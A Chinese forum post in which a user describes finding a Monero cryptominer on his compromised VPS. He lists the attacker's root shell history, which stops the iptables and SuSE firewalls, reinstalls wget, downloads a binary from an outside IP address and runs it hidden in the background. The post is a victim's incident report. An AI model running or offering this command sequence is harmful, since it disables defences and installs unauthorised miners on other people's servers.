V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
taijia
V2EX  ›  Bitcoin

一不小心做了某币的矿工

  •  
  •   taijia · 2018-02-01 00:14:47 +08:00 · 820 次点击
    这是一个创建于 2489 天前的主题,其中的信息可能已经有所发展或是发生改变。

    今天同事说我服务怎么要 30 多秒才能打开,是不是哪儿有问题?
    ssh 到 vps 上一看,原来 cpu 爆了,2 个莫名的进程占了将近 100%的 cpu,直接卡死
    netstat 看了下,发现了一个奇怪的 ip, 163.172.204.213:8888, 果然有问题,
    页面显示:
    Mining server is Online for monero.crypto-pool.fr
    访问了下 monero.crypto-pool.fr ,竟然做了某币矿工,套路啊套路。
    看了下 root 的历史,异常命令如下

    1. /etc/init.d/iptables stop
    2. service iptables stop
    3. SuSEfirewall2 stop
    4. reSuSEfirewall2 stop
    5. chattr -i /usr/bin/wget
    6. chmod 755 /usr/bin/wget
    7. yum install -y wget
    8. wget -c -P /etc/ http://111.73.45.188:9090/start
    9. chmod 755 /etc/start
    10. nohup /etc/start > /dev/null 2>&1 &

    http://111.73.45.188:9090 页面如下:

    不过想想这家伙要是不把 cpu 飙到 100,我还真不会注意,老哥猴车开得急了点了。
    留帖以作纪念,有兴趣的同学可以看看这三个脚本是个啥原理

    目前尚无回复
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   1076 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 23ms · UTC 18:31 · PVG 02:31 · LAX 10:31 · JFK 13:31
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.